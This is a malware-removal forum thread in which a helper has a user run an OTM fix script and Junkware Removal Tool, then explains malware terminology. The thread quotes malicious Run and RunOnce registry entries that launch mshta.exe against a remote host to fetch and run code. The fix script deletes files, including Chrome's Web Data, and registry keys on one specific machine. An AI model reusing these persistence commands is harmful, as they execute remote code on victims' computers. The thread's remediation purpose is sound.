Pop up ad on desktop will not go away...

Make sure that you shutdown both Advanced SystemCare ( and other Iobit protection ) and also Norton 360 before doing the below to avoid problems.

Please download OTM by Old Timer and save it to your Desktop.

• Run OTM.exe by double clicking on it (Note: if using Vista, Win7 or Win8, don't double click, use right click and select Run As Administrator).
• Copy the lines from the below codebox to the clipboard by highlighting ALL of them and pressing CTRL + C
  (or, after highlighting, right-click and choose Copy): Do not include the word Code: which is just a title line of
  the code box

Code:

:Processes
explorer.exe
:Files
C:\Program Files (x86)\Conduit
C:\ProgramData\blekko toolbars
C:\Users\Isao\AppData\Local\Conduit
C:\Users\Isao\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\Isao\AppData\LocalLow\Conduit
C:\Users\Isao\AppData\Local\Temp\*.*
:Reg
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemBootp7nJNmCW6C4skDw0b9oFNTANETNqgn16"=-
"RegWritep7nJNmCW6C4skDw0b9oFNTANETNqgn16"=-
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"RegWritep7nJNmCW6C4skDw0b9oFNTANETNqgn16"=-
[HKEY_USERS\S-1-5-21-2997685425-679866637-1779945573-1000\Software\Microsoft\Windows\CurrentVersion\run]
"SystemBootp7nJNmCW6C4skDw0b9oFNTANETNqgn16"=-
"RegWritep7nJNmCW6C4skDw0b9oFNTANETNqgn16"=-
[HKEY_USERS\S-1-5-21-2997685425-679866637-1779945573-1000\Software\Microsoft\Windows\CurrentVersion\runonce]
"RegWritep7nJNmCW6C4skDw0b9oFNTANETNqgn16"=-
:Commands
[purity]
[EmptyTemp]
[start explorer]
[Reboot]

• Return to OTM, right click in the Paste List of Files/Folders to Move window (under the yellow bar
  ) and choose Paste.
• Now click the large button.
• If OTM asks to reboot your computer, allow it to do so. The report should appear in Notepad after the reboot.
• Close OTM.

Now navigate to the C:\_OTM\MovedFiles folder ( assuming your Windows drive is C). This is where your log will be
saved in the form of Date and Time mmddyyyy_hhmmss.log. Just look for the most recent .log file. Attach
this log file to your next message.

Now please download Junkware Removal Tool to your desktop.

• Shut down your protection software now to avoid potential conflicts.
• Run the tool by double-clicking it. If you are using Windows Vista or Seven, right-mouse click it and select Run as Administrator.
• The tool will open and start scanning your system.
• Note: That JRT may reset your home page to a google default so you will need to restore your home page setting if this happens.
• Please be patient as this can take a while to complete depending on your system's specifications.
• On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
• Attach JRT.txt to your next message.

Now run the C:\MGtools\GetLogs.bat file by double clicking on it (Note: if using Vista, Win7 or Win8, don't double click, use right click and select Run As Administrator).

Then attach the below logs:

• the C:\_OTM\MovedFiles log
• the JRT.TXT log
• C:\MGlogs.zip

Make sure you tell me how things are working now!

 

No it wasn't that bad, and I don't believe that it was a virus. More likely just junkware addons. If you had just stayed here and completed our instructions you would have been all fixed up for free. The instructions I gave you below would have removed the issue with mshta.exe. See my fix below which was removing the below registry entries


O4 - HKCU\..\Run: [SystemBootp7nJNmCW6C4skDw0b9oFNTANETNqgn16] mshta.exe http://dgr.ombnsuwb.net/reg2.php?cccid=p7nJNmCW6C4skDw0b9oFNTANETNqgn16&log=1
O4 - HKCU\..\Run: [RegWritep7nJNmCW6C4skDw0b9oFNTANETNqgn16] mshta.exe http://dgr.ombnsuwb.net/set_inf2.php?cccid=p7nJNmCW6C4skDw0b9oFNTANETNqgn16
O4 - HKCU\..\RunOnce: [RegWritep7nJNmCW6C4skDw0b9oFNTANETNqgn16] mshta.exe http://dgr.ombnsuwb.net/set_inf2.php?cccid=p7nJNmCW6C4skDw0b9oFNTANETNqgn16

The fix was actually quite simple.

 

Because it is not a virus. A virus is not a trojan. There are many forms of malware. Example: virus, trojan, rootkit, information stealers ( not necessarily a trojan ), hijackers, adware, junkware, ....etc. But a virus is something that has a vrius signature and spreads thru other files. This is not what you had. You simply had several registry keys hooked into your startup process that were hooking into mshta..exe and there were name a trojan by Malwarebytes. Again that does not mean it is a virus. It is just a matter of correct terminology. Man people come here with basic adaware and/or junkware and refer to them a virus which is very incorrect. The term malware was coined ( and I may have been one of the first to use ) to cover all the possible different forms of Malicious software. Antivirus programs had to change from just antivirus to actually cover antispyware, trojans, rootkits.etc. They still don't do too much about the adware/junkware that is around which is why many other tools had to be developed. If commercial protection software did a better job at protecting against malware and actually removing it, forums like ours would not exist.

No because they are not the same thing. I would have to see a log of what was being detected but I bet it is just the same thing I was giving you instructions to remove. Norton was probably detecting the same thing over and over. Some of them may have been getting detected in System Restore points which is not really a new detection. It is just being save from the current infection each time a restore point was made.

Running the READ & RUN ME FIRST is always the first step. If it does not fix th problem then the manual instructions will create based on your logs will.

 

You're welcome.

Take a look at the beging of the READ & RUN ME and see Notice # 2 which stated

Potentially yes but we would not know for sure until we looked at your logs. However in general if your antivirus or any other antimalware program warns you of a trojans, rootkits, or anything fitting the description of an information stealer then you should limit your use greatly until fix and for sure do not log into any financial related links either until fixed.

 

You're welcome . Surf safely!